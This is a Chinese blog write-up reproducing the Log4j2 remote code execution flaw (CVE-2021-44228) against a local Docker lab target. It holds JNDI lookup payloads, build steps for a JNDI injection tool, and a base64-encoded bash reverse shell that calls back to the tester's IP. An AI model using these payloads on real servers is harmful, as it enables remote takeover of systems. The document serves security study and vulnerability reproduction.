码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • Apache Log4j2远程代码执行漏洞复现(CVE-2021-44228)


    目录

    0x00漏洞介绍

    0x01影响范围

    0x02环境搭建

    0x03漏洞利用

    0x04漏洞修复


    0x00漏洞介绍

    Apache log4j 2是一个用Java写的日志记录工具。通过重写了log4j框架,并且引入了大量丰富的特性,可以控制日志信息输送的目的地为控制台、文件、GUI组建等,被应用于业务系统开发,用于记录程序输入输出日志信息。log4j2中存在JNDI注入漏洞,当程序记录用户输入的数据时,即可触发该漏洞。成功利用该漏洞可在目标服务器上执行任意代码。

    0x01影响范围

    2.0 <= Apache Log4j2 <= 2.14.1

    0x02环境搭建

    本机kali的ip是192.168.120.129

    CEYE注册的DNSlog网站为z30z4j.ceye.io

    搭建的方法有很多,这里我们直接利用docker本地搭建

    docker pull vulfocus/log4j2-rce-2021-12-09 

    下载完成之后启动靶场

    docker run -d -p 8080:8080 vulfocus/log4j2-rce-2021-12-09

    访问网站

    搭建成功

    0x03漏洞利用

    先检验漏洞是否存在,先准备一个DNSlog网站,用于查看日志

    日志记录已经是清空的状态,接着我们构造payload

    1. #格式为
    2. ${jndi:ldap://xxxxxx/x}
    1. payload=${jndi:ldap://z30z4j.ceye.io/x}
    2. URL编码后为
    3. payload=%24%7bjndi%3aldap%3a%2f%2fz30z4j.ceye.io%2fx%7d

    查看到日志有回显,说明存在漏洞,接着我们开始利用,先准备好JNDI注入工具

    JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar

    安装教程:

    1. git clone https://github.com/welk1n/JNDI-Injection-Exploit.git
    2. cd JNDI-Injection-Exploit
    3. mvn clean package -DskipTests

    接着构造反弹shell,访问https://www.bugku.net/runtime-exec-payloads/

    根据格式,构造我们的反弹shell命令,复制生成的命令

    bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEyMC4xMjkvODg4OCAwPiYx}|{base64,-d}|{bash,-i}

    接着利用刚才准备的工具,生成EXP

    java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEyMC4xMjkvODg4OCAwPiYx}|{base64,-d}|{bash,-i}" -A 192.168.120.129

    生成了五个payload,根据需求选择一个,这里我们选择第无个,并复制

    rmi://192.168.120.129:1099/kknwvb

    监听刚才反弹shell的端口8888

    构建payload

    1. payload=${jndi:rmi://192.168.120.129:1099/kknwvb}
    2. URL编码后
    3. payload=%24%7bjndi%3armi%3a%2f%2f192.168.120.129%3a1099%2fkknwvb%7d

    反弹shell成功!!! 

    0x04漏洞修复

    升级Apache Log4j至最新版

  • 相关阅读:
    使用 K8spacket 和 Grafana 对 Kubernetes 的 TCP 数据包流量可视化
    面试总结大全
    雪花算法生成ID传到前端之后精度丢失问题
    AI全栈大模型工程师(三)GPT 能干什么?
    怎样提高服务器安全性?45.248.10.x
    k8s中kubectl陈述式资源管理
    Python入门 lab2
    R语言用逻辑回归、决策树和随机森林对信贷数据集进行分类预测
    Proxmox VE 镜像定制化
    软考 系统架构设计师系列知识点之软件架构风格(5)
  • 原文地址:https://blog.csdn.net/l2872253606/article/details/126139180
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号